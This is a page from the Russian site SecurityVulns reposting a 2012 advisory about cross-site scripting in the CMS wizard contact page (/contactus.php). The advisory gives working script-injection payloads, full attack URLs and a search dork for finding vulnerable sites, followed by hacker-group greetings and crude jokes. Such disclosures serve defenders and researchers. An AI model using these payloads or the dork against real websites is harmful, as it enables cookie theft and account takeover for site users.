Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Multiple vulnerabilities in 11in1

  Multiple vulnerabilities in LEPTON

  SEC Consult SA-20120220-0 :: Multiple critical vulnerabilities in VOXTRONIC voxlog professional

  SQL Injection Vulnerabilities in TestLink

From:mr xadal <xadalz_(at)_gmail.com>
Date:22 февраля 2012 г.
Subject:CMS wizard Cross Site Scripting

=================================================================
-=CMS wizard Cross Site Scripting
=================================================================

##########################################################
## Author: XaDaL
## Date: 14-02-2012
## vendor: http://www.cmswizard.co.uk/
## tested on: windows mobile
## dork : powered by CMS wizard
##########################################################

This vulnerability affects /contactus.php.

##The impact of this vulnerability
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into
a vulnerable application to fool a user in order to gather data from them.
An attacker can steal the session cookie and take over the account, impersonating
the user. It is also possible to modify the content of the page presented to the user.

##Attack details
URI was set to "><script>alert(document.cookie)</script>

or

              "><script>alert(/XaDaL_GantenG/)</script>


or other

##=XSS=

http://localhost/contactus.php/"><script>alert(document.
cookie)</script>

http://localhost/contactus.
php/"><script>alert(/XaDaL_GantenG/)</script>


!#GREETZ:
kamtiez , 1bli3z , tukulesto , hakz , jundab ,boebefa ,ryan aby , albert wired ,dr.CruzZ
xr0b0t , red r0b0t,El-Farhatz,s1do3l,virgi maho. dan semua yang gak bisa aku sebutin satu-satu (o,0)v


all member magelangcyber , indonesiancoder , codenesia,kill-9,MC-crew.

and aya i love you full :*

#Bogel & dicka cyber: kapan-kapan ngopi bareng lagi gan =))

# Happy fvcklentine...
umbar-umbar titit hhhhhhhhhh :p

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород